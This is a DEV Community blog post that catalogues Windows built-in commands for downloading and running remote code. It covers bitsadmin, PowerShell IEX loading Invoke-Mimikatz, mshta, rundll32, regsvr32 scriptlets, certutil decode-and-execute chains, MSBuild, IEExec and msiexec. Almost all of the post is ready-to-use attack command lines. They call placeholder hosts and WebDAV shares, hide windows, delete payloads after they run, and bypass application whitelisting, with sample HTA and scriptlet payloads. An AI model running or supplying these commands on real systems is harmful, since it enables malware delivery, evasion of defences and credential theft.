DEV Community

Cover image for A Comprehensive Compendium of Windows Download and Execution Commands
Excalibra
Excalibra

Posted on

A Comprehensive Compendium of Windows Download and Execution Commands

Article Abstract: This article presents a systematic compilation of methods for downloading and executing files on Windows systems using various built-in commands, including bitsadmin, PowerShell, mshta, and others. These techniques are applicable to Windows 7 and later versions.


Table of Contents


1. bitsadmin Command (Windows 7 and Above)

The bitsadmin utility can only download files to a specified path on the local system.

bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:\abc.jpg"
Enter fullscreen mode Exit fullscreen mode
bitsadmin /transfer d90f <http://site.com/a> %APPDATA%\d90f.exe&%APPDATA%\d90f.exe&del %APPDATA%\d90f.exe
Enter fullscreen mode Exit fullscreen mode

2. PowerShell Command Download and Execution (Windows 7 and Above)

PowerShell provides powerful capabilities for downloading and executing scripts and binaries directly from remote sources.

powershell IEX (New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1>'); Invoke-Mimikatz
Enter fullscreen mode Exit fullscreen mode
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
Enter fullscreen mode Exit fullscreen mode
powershell (new-object System.Net.WebClient).DownloadFile( 'http://192.168.168.183/1.exe','C:\1111111111111.exe')
Enter fullscreen mode Exit fullscreen mode
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\\1.jpg')
Enter fullscreen mode Exit fullscreen mode

3. mshta Command Download and Execution

The mshta command executes HTML Application (HTA) files, which can contain VBScript or JScript that performs download and execution.

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

mshta http://webserver/payload.hta

mshta \\webdavserver\folder\payload.hta
Enter fullscreen mode Exit fullscreen mode

Sample payload.hta:

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>
Enter fullscreen mode Exit fullscreen mode

4. rundll32 Command Download and Execution

The rundll32 utility can execute functions exported from DLLs, including those hosted on remote WebDAV shares.

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
Enter fullscreen mode Exit fullscreen mode

Reference: https://github.com/3gstudent/Javascript-Backdoor


5. regasm Command from .NET Framework

The regasm.exe tool, part of the .NET Framework, can be used to execute managed DLLs from remote locations.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
Enter fullscreen mode Exit fullscreen mode

6. CMD Remote Command Download

The Windows Command Prompt can directly read and execute commands from a remote batch file.

cmd.exe /k < \\webdavserver\folder\batchfile.txt
Enter fullscreen mode Exit fullscreen mode

7. regsvr32 Command Download and Execution

The regsvr32 utility can register and execute COM objects from remote scriptlet files.

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

regsvr32 /u /s /i:<http://site.com/js.png> scrobj.dll
Enter fullscreen mode Exit fullscreen mode

Sample js.png (Scriptlet):

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
    </script>
</registration>
</scriptlet>
Enter fullscreen mode Exit fullscreen mode

8. certutil Command Download and Execution

The certutil utility, primarily used for certificate management, can also download files and decode Base64-encoded content.

certutil -urlcache -split -f http://webserver/payload payload
Enter fullscreen mode Exit fullscreen mode
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
Enter fullscreen mode Exit fullscreen mode
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
Enter fullscreen mode Exit fullscreen mode
certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
Enter fullscreen mode Exit fullscreen mode

9. MSBuild Command from .NET Framework

The MSBuild tool, part of the .NET Framework, can execute tasks defined in XML project files, enabling remote code execution.

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
Enter fullscreen mode Exit fullscreen mode

10. odbcconf Command Download and Execution

The odbcconf utility can be used to register DLLs remotely via its regsvr command.

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
Enter fullscreen mode Exit fullscreen mode

11. cscript Script Remote Command Download and Execution

The cscript command executes VBScript or JScript scripts, which can be hosted remotely.

cscript //E:jscript \\webdavserver\folder\payload.txt
Enter fullscreen mode Exit fullscreen mode

Sample downfile.vbs:

' Set your settings
strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
strHDLocation = "c:\logo.jpg"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
Enter fullscreen mode Exit fullscreen mode

Execution Command:

cscript downfile.vbs
Enter fullscreen mode Exit fullscreen mode

12. pubprn.vbs Download and Execution Command

The pubprn.vbs script, part of Windows printing administration, can execute remote scriptlet files.

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:<https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct>
Enter fullscreen mode Exit fullscreen mode

13. Native Windows copy Command

The built-in copy and xcopy commands can copy files from remote SMB shares.

copy \\x.x.x.x\xx\poc.exe
xcopy d:\test.exe \\x.x.x.x\test.exe
Enter fullscreen mode Exit fullscreen mode

14. IEXPLORE.EXE Command Download and Execution (Requires IE 0-day)

Internet Explorer can be launched from the command line to access a remote URL, potentially triggering a vulnerability.

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" <http://site.com/exp>
Enter fullscreen mode Exit fullscreen mode

15. IEExec Command Download and Execution

IEExec.exe, part of the .NET Framework, can execute managed code from remote locations.

C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec <http://site.com/files/test64.exe>
Enter fullscreen mode Exit fullscreen mode

Reference: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/


16. msiexec Command Download and Execution

The msiexec installer can execute MSI packages hosted on remote servers.

msiexec /q /i <http://site.com/payloads/calc.png>
Enter fullscreen mode Exit fullscreen mode

17. GreatSCT Download and Execution Project

GreatSCT is a project that provides various techniques for bypassing application whitelisting and executing payloads.

Reference: https://github.com/GreatSCT

Top comments (0)